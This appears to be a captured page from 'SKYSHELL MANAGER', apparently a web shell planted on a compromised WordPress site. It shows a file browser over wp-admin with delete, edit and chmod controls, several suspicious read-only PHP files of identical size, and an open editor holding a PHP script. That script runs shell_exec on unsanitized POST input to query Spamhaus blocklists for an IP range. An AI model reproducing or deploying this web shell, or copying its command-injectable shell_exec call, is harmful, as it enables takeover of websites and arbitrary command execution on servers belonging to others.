📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: check_css_range.php
<?php function ipToDecimal($ip) { $parts = explode('.', $ip); return ($parts[0] << 24) + ($parts[1] << 16) + ($parts[2] << 8) + $parts[3]; } function decimalToIp($dec) { return long2ip($dec); } $startIP = $_POST['start_ip'] ?? ''; $endIP = $_POST['end_ip'] ?? ''; $startDec = ipToDecimal($startIP); $endDec = ipToDecimal($endIP); $totalChecked = 0; $listedCount = 0; $rowNum = 1; $listedIPs = []; for ($i = $startDec; $i <= $endDec; $i++) { $ip = decimalToIp($i); $reversed = implode('.', array_reverse(explode('.', $ip))) . '.zen.spamhaus.org'; $result = trim(shell_exec("dig +short $reversed @8.8.8.8")); $totalChecked++; if ($result === "127.0.0.3") { $listedIPs[] = $ip; $listedCount++; } } ?> <!DOCTYPE html> <html> <head> <title>CSS Check Result</title> <style> body { font-family: Arial, sans-serif; background: #f9f9f9; padding: 30px; } .result-box { max-width: 700px; margin: auto; background: white; padding: 25px; border-radius: 10px; box-shadow: 0 0 10px rgba(0,0,0,0.1); } h2 { text-align: center; margin-bottom: 25px; } table { width: 100%; border-collapse: collapse; margin-top: 15px; } th, td { border: 1px solid #ddd; padding: 10px; text-align: center; } th { background-color: #444; color: white; } tr:nth-child(even) { background-color: #f2f2f2; } .summary { margin-top: 20px; font-weight: bold; } </style> </head> <body> <div class="result-box"> <h2>Spamhaus CSS Check Results</h2> <p><strong>Checked Range:</strong> <?= htmlspecialchars($startIP) ?> to <?= htmlspecialchars($endIP) ?></p> <table> <tr><th>#</th><th>Listed IP</th></tr> <?php foreach ($listedIPs as $index => $ip): ?> <tr><td><?= $index + 1 ?></td><td><?= $ip ?></td></tr> <?php endforeach; ?> </table> <div class="summary"> Total IPs checked: <?= $totalChecked ?><br> Total IPs listed in CSS: <?= $listedCount ?> </div> </div> </body> </html>
Save